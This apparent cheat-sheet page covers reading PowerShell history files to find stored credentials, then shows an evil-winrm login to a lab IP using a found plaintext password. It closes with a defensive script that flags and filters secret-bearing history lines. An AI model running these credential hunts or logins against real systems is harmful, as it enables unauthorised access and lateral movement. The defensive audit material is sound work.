>_ shadow.red

PowerShell History Hunting


Show current user’s history

Get-History
(Get-PSReadlineOption).HistorySavePath
type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Cross-user via env ($env:APPDATA resolves to the profile of whichever account runs the command)

powershell -c type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Pivot using found credentials (example)

evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!"
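
From the defender's side, the same history file can be audited and kept clean. The following is an added example, not part of the original page: the keyword list, function names and sample lines are assumptions constructed for illustration, and the snippet is meant to live in `$PROFILE` so the functions stay defined for the session.

```powershell
# Added example (not from the original page). Keywords and names are assumptions.
$SensitivePattern = '(password|passwd|secret|token|apikey|api_key|-AsPlainText)'

function Test-SensitiveHistoryLine {
    # True when a command line looks like it carries a secret.
    param([string]$Line)
    return $Line -match $SensitivePattern
}

function Find-SensitiveHistoryLine {
    # Reports line number and matched keyword only, never the command itself,
    # so the audit output does not become a second copy of the secret.
    param([string[]]$Lines)
    for ($i = 0; $i -lt $Lines.Count; $i++) {
        if ($Lines[$i] -match $SensitivePattern) {
            [pscustomobject]@{ LineNumber = $i + 1; Keyword = $Matches[1] }
        }
    }
}

# Constructed sample history (placeholder values, not real credentials).
$sample = @(
    'Get-Process',
    '$pw = ConvertTo-SecureString "Placeholder-Not-Real" -AsPlainText -Force',
    'cd C:\Temp',
    'net use \\fileserver\share /user:EXAMPLE\svc Password-Placeholder'
)
Find-SensitiveHistoryLine -Lines $sample | Format-Table   # flags lines 2 and 4

if (Get-Command Set-PSReadLineOption -ErrorAction SilentlyContinue) {
    # Audit the current user's own saved history file.
    $path = (Get-PSReadLineOption).HistorySavePath
    if (Test-Path $path) {
        Find-SensitiveHistoryLine -Lines (Get-Content $path) | Format-Table
    }

    # Prevention: returning $false keeps the line out of PSReadLine history.
    Set-PSReadLineOption -AddToHistoryHandler {
        param([string]$line)
        -not (Test-SensitiveHistoryLine -Line $line)
    }
    # Stricter alternative: write no history file at all.
    # Set-PSReadLineOption -HistorySaveStyle SaveNothing
}
```

The handler only affects commands typed after it is registered; lines already in `ConsoleHost_history.txt` stay there until removed, and any credential the audit flags should be rotated.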